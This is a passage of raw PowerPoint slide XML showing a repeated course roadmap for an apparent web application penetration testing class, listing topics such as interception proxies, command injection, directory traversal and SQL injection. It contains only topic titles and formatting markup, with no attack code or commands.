              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
